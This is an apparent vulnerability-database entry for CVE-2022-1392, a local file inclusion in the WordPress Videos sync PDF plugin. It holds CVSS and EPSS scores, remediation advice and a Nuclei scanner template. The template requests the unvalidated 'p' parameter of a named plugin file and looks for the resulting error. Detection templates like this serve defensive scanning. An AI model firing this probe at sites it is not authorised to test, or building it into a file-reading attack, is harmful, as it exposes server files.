Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1392
HistoryMay 13, 2022 - 3:48 a.m.

WordPress Videos sync PDF <=1.7.4 - Local File Inclusion

2022-05-1303:48:08
ProjectDiscovery
github.com
8
wordpress
videos sync pdf
local file inclusion
cve-2022-1392
unauthenticated
wpscan
packet storm
commoninja

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.015

Percentile

87.1%

WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.

id: CVE-2022-1392

info:
  name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion
  author: Veshraj
  severity: high
  description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
  remediation: |
    Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
    - https://packetstormsecurity.com/files/166534/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1392
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1392
    cwe-id: CWE-22
    epss-score: 0.01514
    epss-percentile: 0.86976
    cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: commoninja
    product: videos_sync_pdf
    framework: wordpress
  tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "failed to open stream: No such file or directory"
          - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204a89887660dcad34874379eb3dd739208943d8e92f37c7c89ec5316ec31ac98202201fb7c418c9a39bfb513901bb779b2f44bda4dd4d760fc93668612348e6481f04:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.015

Percentile

87.1%

Related for NUCLEI:CVE-2022-1392